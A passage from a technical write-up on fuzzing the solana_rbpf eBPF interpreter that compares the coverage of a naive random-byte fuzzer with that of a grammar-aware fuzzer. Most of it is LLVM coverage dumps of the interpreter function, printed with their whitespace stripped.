Below is the final code for the fuzzer, including all of the bits I didn’t
show above for concision.
After executing the fuzzer, we can evaluate its effectiveness at finding
interesting inputs by checking its coverage after executing for a given time
(note the use of the -max_total_time flag). In this case, I want to
determine just how well it covers the function which handles
interpreter execution.
To do so, I issue the following commands:
If you’re not familiar with llvm coverage output, the first column is the line
number, the second column is the number of times that that particular line was
hit, and the third column is the code itself.
<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError,solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:709|763|fnexecute_program_interpreted_inner(710|763|&mutself,711|763|instruction_meter:&mutI,712|763|initial_insn_count:u64,713|763|last_insn_count:&mutu64,714|763|)->ProgramResult<E>{715|763|// R1 points to beginning of input memory, R10 to the stack of the first frame716|763|letmutreg:[u64;11]=[0,0,0,0,0,0,0,0,0,0,self.stack.get_frame_ptr()];717|763|reg[1]=ebpf::MM_INPUT_START;718|763|719|763|// Loop on instructions720|763|letconfig=self.executable.get_config();721|763|letmutnext_pc:usize=self.executable.get_entrypoint_instruction_offset()?;^0722|763|letmutremaining_insn_count=initial_insn_count;723|136k|while(next_pc+1)*ebpf::INSN_SIZE<=self.program.len(){724|135k|*last_insn_count+=1;725|135k|letpc=next_pc;726|135k|next_pc+=1;727|135k|letmutinstruction_width=1;728|135k|letmutinsn=ebpf::get_insn_unchecked(self.program,pc);729|135k|letdst=insn.dstasusize;730|135k|letsrc=insn.srcasusize;731|135k|732|135k|ifconfig.enable_instruction_tracing{733|0|letmutstate=[0u64;12];734|0|state[0..11].copy_from_slice(®);735|0|state[11]=pcasu64;736|0|self.tracer.trace(state);737|135k|}738||739|135k|matchinsn.opc{740|135k|_ifdst==STACK_PTR_REG&&config.dynamic_stack_frames=>{741|361|matchinsn.opc{742|16|ebpf::SUB64_IMM=>self.stack.resize_stack(-insn.imm),743|345|ebpf::ADD64_IMM=>self.stack.resize_stack(insn.imm),744||_=>{745||#[cfg(debug_assertions)]746|0|unreachable!("unexpected insn on r11")747||}748||}749||}750||751||// BPF_LD class752||// Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not753||// bother re-fetching it, just use ebpf::MM_INPUT_START already.754||ebpf::LD_ABS_B=>{755|3|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);756|3|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u8);^0757|0|reg[0]=unsafe{*host_ptrasu64};758||},759||ebpf::LD_ABS_H=>{760|3|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);761|3|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u16);^0762|0|reg[0]=unsafe{*host_ptrasu64};763||},764||ebpf::LD_ABS_W=>{765|2|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);766|2|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u32);^0767|0|reg[0]=unsafe{*host_ptrasu64};768||},769||ebpf::LD_ABS_DW=>{770|4|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);771|4|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u64);^0772|0|reg[0]=unsafe{*host_ptrasu64};773||},774||ebpf::LD_IND_B=>{775|2|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);776|2|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u8);^0777|0|reg[0]=unsafe{*host_ptrasu64};778||},779||ebpf::LD_IND_H=>{780|3|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);781|3|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u16);^0782|0|reg[0]=unsafe{*host_ptrasu64};783||},784||ebpf::LD_IND_W=>{785|7|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);786|7|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u32);^0787|0|reg[0]=unsafe{*host_ptrasu64};788||},789||ebpf::LD_IND_DW=>{790|3|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);791|3|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u64);^0792|0|reg[0]=unsafe{*host_ptrasu64};793||},794||795|0|ebpf::LD_DW_IMM=>{796|0|ebpf::augment_lddw_unchecked(self.program,&mutinsn);797|0|instruction_width=2;798|0|next_pc+=1;799|0|reg[dst]=insn.immasu64;800|0|},801||802||// BPF_LDX class803||ebpf::LD_B_REG=>{804|18|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;805|18|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u8);^2806|2|reg[dst]=unsafe{*host_ptrasu64};807||},808||ebpf::LD_H_REG=>{809|18|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;810|18|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u16);^6811|6|reg[dst]=unsafe{*host_ptrasu64};812||},813||ebpf::LD_W_REG=>{814|365|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;815|365|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u32);^348816|348|reg[dst]=unsafe{*host_ptrasu64};817||},818||ebpf::LD_DW_REG=>{819|15|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;820|15|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u64);^5821|5|reg[dst]=unsafe{*host_ptrasu64};822||},823||824||// BPF_ST class825||ebpf::ST_B_IMM=>{826|26|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;827|26|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u8);^20828|20|unsafe{*host_ptr=insn.immasu8};829||},830||ebpf::ST_H_IMM=>{831|23|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;832|23|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u16);^13833|13|unsafe{*host_ptr=insn.immasu16};834||},835||ebpf::ST_W_IMM=>{836|12|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;837|12|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u32);^5838|5|unsafe{*host_ptr=insn.immasu32};839||},840||ebpf::ST_DW_IMM=>{841|17|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;842|17|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u64);^11843|11|unsafe{*host_ptr=insn.immasu64};844||},845||846||// BPF_STX class847||ebpf::ST_B_REG=>{848|17|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;849|17|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u8);^3850|3|unsafe{*host_ptr=reg[src]asu8};851||},852||ebpf::ST_H_REG=>{853|13|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;854|13|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u16);^3855|3|unsafe{*host_ptr=reg[src]asu16};856||},857||ebpf::ST_W_REG=>{858|19|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;859|19|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u32);^7860|7|unsafe{*host_ptr=reg[src]asu32};861||},862||ebpf::ST_DW_REG=>{863|8|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;864|8|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u64);^2865|2|unsafe{*host_ptr=reg[src]asu64};866||},867||868||// BPF_ALU class869|1.06k|ebpf::ADD32_IMM=>reg[dst]=(reg[dst]asi32).wrapping_add(insn.immasi32)asu64,870|695|ebpf::ADD32_REG=>reg[dst]=(reg[dst]asi32).wrapping_add(reg[src]asi32)asu64,871|710|ebpf::SUB32_IMM=>reg[dst]=(reg[dst]asi32).wrapping_sub(insn.immasi32)asu64,872|345|ebpf::SUB32_REG=>reg[dst]=(reg[dst]asi32).wrapping_sub(reg[src]asi32)asu64,873|1.03k|ebpf::MUL32_IMM=>reg[dst]=(reg[dst]asi32).wrapping_mul(insn.immasi32)asu64,874|2.07k|ebpf::MUL32_REG=>reg[dst]=(reg[dst]asi32).wrapping_mul(reg[src]asi32)asu64,875|1.03k|ebpf::DIV32_IMM=>reg[dst]=(reg[dst]asu32/insn.immasu32)asu64,876||ebpf::DIV32_REG=>{877|4|ifreg[src]asu32==0{878|2|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));879|2|}880|2|reg[dst]=(reg[dst]asu32/reg[src]asu32)asu64;881||},882||ebpf::SDIV32_IMM=>{883|346|ifreg[dst]asi32==i32::MIN&&insn.imm==-1{^0884|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));885|346|}886|346|reg[dst]=(reg[dst]asi32/insn.immasi32)asu64;887||}888||ebpf::SDIV32_REG=>{889|13|ifreg[src]asi32==0{890|2|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));891|11|}892|11|ifreg[dst]asi32==i32::MIN&®[src]asi32==-1{^0893|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));894|11|}895|11|reg[dst]=(reg[dst]asi32/reg[src]asi32)asu64;896||},897|346|ebpf::OR32_IMM=>reg[dst]=(reg[dst]asu32|insn.immasu32)asu64,898|351|ebpf::OR32_REG=>reg[dst]=(reg[dst]asu32|reg[src]asu32)asu64,899|345|ebpf::AND32_IMM=>reg[dst]=(reg[dst]asu32&insn.immasu32)asu64,900|1.03k|ebpf::AND32_REG=>reg[dst]=(reg[dst]asu32®[src]asu32)asu64,901|0|ebpf::LSH32_IMM=>reg[dst]=(reg[dst]asu32).wrapping_shl(insn.immasu32)asu64,902|369|ebpf::LSH32_REG=>reg[dst]=(reg[dst]asu32).wrapping_shl(reg[src]asu32)asu64,903|0|ebpf::RSH32_IMM=>reg[dst]=(reg[dst]asu32).wrapping_shr(insn.immasu32)asu64,904|346|ebpf::RSH32_REG=>reg[dst]=(reg[dst]asu32).wrapping_shr(reg[src]asu32)asu64,905|690|ebpf::NEG32=>{reg[dst]=(reg[dst]asi32).wrapping_neg()asu64;reg[dst]&=u32::MAXasu64;},906|347|ebpf::MOD32_IMM=>reg[dst]=(reg[dst]asu32%insn.immasu32)asu64,907||ebpf::MOD32_REG=>{908|4|ifreg[src]asu32==0{909|2|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));910|2|}911|2|reg[dst]=(reg[dst]asu32%reg[src]asu32)asu64;912||},913|1.04k|ebpf::XOR32_IMM=>reg[dst]=(reg[dst]asu32^insn.immasu32)asu64,914|2.74k|ebpf::XOR32_REG=>reg[dst]=(reg[dst]asu32^reg[src]asu32)asu64,915|349|ebpf::MOV32_IMM=>reg[dst]=insn.immasu32asu64,916|1.03k|ebpf::MOV32_REG=>reg[dst]=(reg[src]asu32)asu64,917|0|ebpf::ARSH32_IMM=>{reg[dst]=(reg[dst]asi32).wrapping_shr(insn.immasu32)asu64;reg[dst]&=u32::MAXasu64;},918|2|ebpf::ARSH32_REG=>{reg[dst]=(reg[dst]asi32).wrapping_shr(reg[src]asu32)asu64;reg[dst]&=u32::MAXasu64;},919|0|ebpf::LE=>{920|0|reg[dst]=matchinsn.imm{921|0|16=>(reg[dst]asu16).to_le()asu64,922|0|32=>(reg[dst]asu32).to_le()asu64,923|0|64=>reg[dst].to_le(),924||_=>{925|0|returnErr(EbpfError::InvalidInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET));926||}927||};928||},929|0|ebpf::BE=>{930|0|reg[dst]=matchinsn.imm{931|0|16=>(reg[dst]asu16).to_be()asu64,932|0|32=>(reg[dst]asu32).to_be()asu64,933|0|64=>reg[dst].to_be(),934||_=>{935|0|returnErr(EbpfError::InvalidInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET));936||}937||};938||},939||940||// BPF_ALU64 class941|402|ebpf::ADD64_IMM=>reg[dst]=reg[dst].wrapping_add(insn.immasu64),942|351|ebpf::ADD64_REG=>reg[dst]=reg[dst].wrapping_add(reg[src]),943|1.12k|ebpf::SUB64_IMM=>reg[dst]=reg[dst].wrapping_sub(insn.immasu64),944|721|ebpf::SUB64_REG=>reg[dst]=reg[dst].wrapping_sub(reg[src]),945|3.06k|ebpf::MUL64_IMM=>reg[dst]=reg[dst].wrapping_mul(insn.immasu64),946|1.71k|ebpf::MUL64_REG=>reg[dst]=reg[dst].wrapping_mul(reg[src]),947|1.39k|ebpf::DIV64_IMM=>reg[dst]/=insn.immasu64,948||ebpf::DIV64_REG=>{949|23|ifreg[src]==0{950|12|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));951|11|}952|11|reg[dst]/=reg[src];953||},954||ebpf::SDIV64_IMM=>{955|1.40k|ifreg[dst]asi64==i64::MIN&&insn.imm==-1{^0956|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));957|1.40k|}958|1.40k|959|1.40k|reg[dst]=(reg[dst]asi64/insn.imm)asu64960||}961||ebpf::SDIV64_REG=>{962|12|ifreg[src]==0{963|5|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));964|7|}965|7|ifreg[dst]asi64==i64::MIN&®[src]asi64==-1{^0966|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));967|7|}968|7|reg[dst]=(reg[dst]asi64/reg[src]asi64)asu64;969||},970|838|ebpf::OR64_IMM=>reg[dst]|=insn.immasu64,971|1.37k|ebpf::OR64_REG=>reg[dst]|=reg[src],972|2.14k|ebpf::AND64_IMM=>reg[dst]&=insn.immasu64,973|4.47k|ebpf::AND64_REG=>reg[dst]&=reg[src],974|0|ebpf::LSH64_IMM=>reg[dst]=reg[dst].wrapping_shl(insn.immasu32),975|1.73k|ebpf::LSH64_REG=>reg[dst]=reg[dst].wrapping_shl(reg[src]asu32),976|0|ebpf::RSH64_IMM=>reg[dst]=reg[dst].wrapping_shr(insn.immasu32),977|1.03k|ebpf::RSH64_REG=>reg[dst]=reg[dst].wrapping_shr(reg[src]asu32),978|5.59k|ebpf::NEG64=>reg[dst]=(reg[dst]asi64).wrapping_neg()asu64,979|2.85k|ebpf::MOD64_IMM=>reg[dst]%=insn.immasu64,980||ebpf::MOD64_REG=>{981|3|ifreg[src]==0{982|2|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));983|1|}984|1|reg[dst]%=reg[src];985||},986|2.28k|ebpf::XOR64_IMM=>reg[dst]^=insn.immasu64,987|1.41k|ebpf::XOR64_REG=>reg[dst]^=reg[src],988|383|ebpf::MOV64_IMM=>reg[dst]=insn.immasu64,989|4.24k|ebpf::MOV64_REG=>reg[dst]=reg[src],990|0|ebpf::ARSH64_IMM=>reg[dst]=(reg[dst]asi64).wrapping_shr(insn.immasu32)asu64,991|357|ebpf::ARSH64_REG=>reg[dst]=(reg[dst]asi64).wrapping_shr(reg[src]asu32)asu64,992||993||// BPF_JMP class994|4.43k|ebpf::JA=>{next_pc=(next_pcasisize+insn.offasisize)asusize;},995|10|ebpf::JEQ_IMM=>ifreg[dst]==insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^0996|1.36k|ebpf::JEQ_REG=>ifreg[dst]==reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1.36k^2997|4.16k|ebpf::JGT_IMM=>ifreg[dst]>insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1.42k^2.74k998|1.73k|ebpf::JGT_REG=>ifreg[dst]>reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1.39k^343999|343|ebpf::JGE_IMM=>ifreg[dst]>=insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^01000|2.04k|ebpf::JGE_REG=>ifreg[dst]>=reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1.70k^3421001|2.04k|ebpf::JLT_IMM=>ifreg[dst]<insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^2.04k^11002|342|ebpf::JLT_REG=>ifreg[dst]<reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^01003|1.02k|ebpf::JLE_IMM=>ifreg[dst]<=insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^01004|2.38k|ebpf::JLE_REG=>ifreg[dst]<=reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^2.38k^11005|1.76k|ebpf::JSET_IMM=>ifreg[dst]&insn.immasu64!=0{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1.42k^3471006|686|ebpf::JSET_REG=>ifreg[dst]®[src]!=0{next_pc=(next_pcasisize+insn.offasisize)asusize;},^01007|6.48k|ebpf::JNE_IMM=>ifreg[dst]!=insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^01008|2.44k|ebpf::JNE_REG=>ifreg[dst]!=reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1.40k^1.03k1009|18.1k|ebpf::JSGT_IMM=>ifreg[dst]asi64>insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^17.7k^3631010|2.08k|ebpf::JSGT_REG=>ifreg[dst]asi64>reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^2.07k^121011|14.3k|ebpf::JSGE_IMM=>ifreg[dst]asi64>=insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^12.9k^1.37k1012|3.45k|ebpf::JSGE_REG=>ifreg[dst]asi64>=reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^3.44k^121013|1.36k|ebpf::JSLT_IMM=>if(reg[dst]asi64)<insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1.02k^3461014|2|ebpf::JSLT_REG=>if(reg[dst]asi64)<reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^01015|2.05k|ebpf::JSLE_IMM=>if(reg[dst]asi64)<=insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^2.04k^141016|6.83k|ebpf::JSLE_REG=>if(reg[dst]asi64)<=reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^6.83k^71017||1018||ebpf::CALL_REG=>{1019|0|lettarget_address=reg[insn.immasusize];1020|0|reg[ebpf::FRAME_PTR_REG]=1021|0|self.stack.push(®[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG+ebpf::SCRATCH_REGS],next_pc)?;1022|0|iftarget_address<self.program_vm_addr{1023|0|returnErr(EbpfError::CallOutsideTextSegment(pc+ebpf::ELF_INSN_DUMP_OFFSET,target_address/ebpf::INSN_SIZEasu64*ebpf::INSN_SIZEasu64));1024|0|}1025|0|next_pc=self.check_pc(pc,(target_address-self.program_vm_addr)asusize/ebpf::INSN_SIZE)?;1026||},1027||1028||// Do not delegate the check to the verifier, since registered functions can be1029||// changed after the program has been verified.1030||ebpf::CALL_IMM=>{1031|22|letmutresolved=false;1032|22|let(syscalls,calls)=ifconfig.static_syscalls{1033|22|(insn.src==0,insn.src!=0)1034||}else{1035|0|(true,true)1036||};1037||1038|22|ifsyscalls{1039|2|ifletSome(syscall)=self.executable.get_syscall_registry().lookup_syscall(insn.immasu32){^01040|0|resolved=true;1041|0|1042|0|ifconfig.enable_instruction_meter{1043|0|let_=instruction_meter.consume(*last_insn_count);1044|0|}1045|0|*last_insn_count=0;1046|0|letmutresult:ProgramResult<E>=Ok(0);1047|0|(unsafe{std::mem::transmute::<u64,SyscallFunction::<E,*mutu8>>(syscall.function)})(1048|0|self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET+syscall.context_object_slot],1049|0|reg[1],1050|0|reg[2],1051|0|reg[3],1052|0|reg[4],1053|0|reg[5],1054|0|&self.memory_mapping,1055|0|&mutresult,1056|0|);1057|0|reg[0]=result?;1058|0|ifconfig.enable_instruction_meter{1059|0|remaining_insn_count=instruction_meter.get_remaining();1060|0|}1061|2|}1062|20|}1063||1064|22|ifcalls{1065|20|ifletSome(target_pc)=self.executable.lookup_bpf_function(insn.immasu32){^01066|0|resolved=true;1067||1068||// make BPF to BPF call1069|0|reg[ebpf::FRAME_PTR_REG]=1070|0|self.stack.push(®[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG+ebpf::SCRATCH_REGS],next_pc)?;1071|0|next_pc=self.check_pc(pc,target_pc)?;1072|20|}1073|2|}1074||1075|22|if!resolved{1076|22|ifconfig.disable_unresolved_symbols_at_runtime{1077|6|returnErr(EbpfError::UnsupportedInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET));1078||}else{1079|16|self.executable.report_unresolved_symbol(pc)?;1080||}1081|0|}1082||}1083||1084||ebpf::EXIT=>{1085|14|matchself.stack.pop::<E>(){1086|0|Ok((saved_reg,frame_ptr,ptr))=>{1087|0|// Return from BPF to BPF call1088|0|reg[ebpf::FIRST_SCRATCH_REG1089|0|..ebpf::FIRST_SCRATCH_REG+ebpf::SCRATCH_REGS]1090|0|.copy_from_slice(&saved_reg);1091|0|reg[ebpf::FRAME_PTR_REG]=frame_ptr;1092|0|next_pc=self.check_pc(pc,ptr)?;1093||}1094||_=>{1095|14|returnOk(reg[0]);1096||}1097||}1098||}1099|0|_=>returnErr(EbpfError::UnsupportedInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET)),1100||}1101||1102|135k|ifconfig.enable_instruction_meter&&*last_insn_count>=remaining_insn_count{1103||// Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction1104|130|returnErr(EbpfError::ExceededMaxInstructions(pc+instruction_width+ebpf::ELF_INSN_DUMP_OFFSET,initial_insn_count));1105|135k|}1106||}1107||1108|419|Err(EbpfError::ExecutionOverrun(1109|419|next_pc+ebpf::ELF_INSN_DUMP_OFFSET,1110|419|))1111|763|}
Unfortunately, this fuzzer doesn’t seem to achieve the coverage we expect.
Several instructions are missed (note the 0 coverage on some branches of the
match) and there are no jumps, calls, or other control-flow-relevant
instructions. This is largely because throwing random bytes at any parser
just isn’t going to be effective; most things will get caught at the
verification stage, and very little will actually test the program.
We must improve this before we continue or we’ll be waiting forever for our
fuzzer to find useful bugs.
At this point, we’re about two hours into development.
The smart fuzzer
eBPF is a quite simple instruction set;
you can read the whole definition
in just a few pages. Knowing this: why don’t we constrain our input to just
these instructions? This approach is commonly called “grammar-aware” fuzzing
on account of the fact that the inputs are constrained to some grammar. It is
very powerful as a concept, and is used to test a variety of large targets
which have strict parsing rules.
To create this grammar-aware fuzzer, I inspected the helpfully-named and
provided insn_builder.rs
which would allow me to create instructions. Now, all I needed to do was
represent all the different instructions. By cross referencing with eBPF
documentation, we can represent each possible operation in a single enum.
You can see the whole grammar.rs in the rBPF repo
if you wish, but the two most relevant sections are provided below.
Defining the enum that represents all instructions
You’ll see here that our generation doesn’t really care to ensure that
instructions are valid, just that they’re in the right format. For example,
we don’t verify registers, addresses, jump targets, etc.; we just slap it
together and see if it works. This is to prevent over-specialisation, where
our attempts to fuzz things only make “boring” inputs that don’t test cases
that would normally be considered invalid.
Okay – let’s make a fuzzer with this. The only real difference here is that
our input format is now changed to have our new FuzzProgram type instead of
raw bytes:
The whole fuzzer, though really it's not that different
This fuzzer expresses a particular stage in development. The differential
fuzzer is significantly different in a few key aspects that will be discussed
later.
If you’re not familiar with llvm coverage output, the first column is the line
number, the second column is the number of times that that particular line was
hit, and the third column is the code itself.
<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError,solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:709|886|fnexecute_program_interpreted_inner(710|886|&mutself,711|886|instruction_meter:&mutI,712|886|initial_insn_count:u64,713|886|last_insn_count:&mutu64,714|886|)->ProgramResult<E>{715|886|// R1 points to beginning of input memory, R10 to the stack of the first frame716|886|letmutreg:[u64;11]=[0,0,0,0,0,0,0,0,0,0,self.stack.get_frame_ptr()];717|886|reg[1]=ebpf::MM_INPUT_START;718|886|719|886|// Loop on instructions720|886|letconfig=self.executable.get_config();721|886|letmutnext_pc:usize=self.executable.get_entrypoint_instruction_offset()?;^0722|886|letmutremaining_insn_count=initial_insn_count;723|2.16M|while(next_pc+1)*ebpf::INSN_SIZE<=self.program.len(){724|2.16M|*last_insn_count+=1;725|2.16M|letpc=next_pc;726|2.16M|next_pc+=1;727|2.16M|letmutinstruction_width=1;728|2.16M|letmutinsn=ebpf::get_insn_unchecked(self.program,pc);729|2.16M|letdst=insn.dstasusize;730|2.16M|letsrc=insn.srcasusize;731|2.16M|732|2.16M|ifconfig.enable_instruction_tracing{733|0|letmutstate=[0u64;12];734|0|state[0..11].copy_from_slice(®);735|0|state[11]=pcasu64;736|0|self.tracer.trace(state);737|2.16M|}738||739|2.16M|matchinsn.opc{740|2.16M|_ifdst==STACK_PTR_REG&&config.dynamic_stack_frames=>{741|6|matchinsn.opc{742|2|ebpf::SUB64_IMM=>self.stack.resize_stack(-insn.imm),743|4|ebpf::ADD64_IMM=>self.stack.resize_stack(insn.imm),744||_=>{745||#[cfg(debug_assertions)]746|0|unreachable!("unexpected insn on r11")747||}748||}749||}750||751||// BPF_LD class752||// Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not753||// bother re-fetching it, just use ebpf::MM_INPUT_START already.754||ebpf::LD_ABS_B=>{755|5|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);756|5|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u8);^2757|2|reg[0]=unsafe{*host_ptrasu64};758||},759||ebpf::LD_ABS_H=>{760|3|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);761|3|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u16);^1762|1|reg[0]=unsafe{*host_ptrasu64};763||},764||ebpf::LD_ABS_W=>{765|6|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);766|6|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u32);^2767|2|reg[0]=unsafe{*host_ptrasu64};768||},769||ebpf::LD_ABS_DW=>{770|4|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(insn.immasu32asu64);771|4|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u64);^1772|1|reg[0]=unsafe{*host_ptrasu64};773||},774||ebpf::LD_IND_B=>{775|9|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);776|9|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u8);^1777|1|reg[0]=unsafe{*host_ptrasu64};778||},779||ebpf::LD_IND_H=>{780|3|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);781|3|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u16);^1782|1|reg[0]=unsafe{*host_ptrasu64};783||},784||ebpf::LD_IND_W=>{785|4|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);786|4|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u32);^2787|2|reg[0]=unsafe{*host_ptrasu64};788||},789||ebpf::LD_IND_DW=>{790|2|letvm_addr=ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.immasu32asu64);791|2|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u64);^0792|0|reg[0]=unsafe{*host_ptrasu64};793||},794||795|6|ebpf::LD_DW_IMM=>{796|6|ebpf::augment_lddw_unchecked(self.program,&mutinsn);797|6|instruction_width=2;798|6|next_pc+=1;799|6|reg[dst]=insn.immasu64;800|6|},801||802||// BPF_LDX class803||ebpf::LD_B_REG=>{804|21|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;805|21|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u8);^4806|4|reg[dst]=unsafe{*host_ptrasu64};807||},808||ebpf::LD_H_REG=>{809|4|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;810|4|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u16);^1811|1|reg[dst]=unsafe{*host_ptrasu64};812||},813||ebpf::LD_W_REG=>{814|26|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;815|26|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u32);^19816|19|reg[dst]=unsafe{*host_ptrasu64};817||},818||ebpf::LD_DW_REG=>{819|5|letvm_addr=(reg[src]asi64).wrapping_add(insn.offasi64)asu64;820|5|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Load,pc,u64);^1821|1|reg[dst]=unsafe{*host_ptrasu64};822||},823||824||// BPF_ST 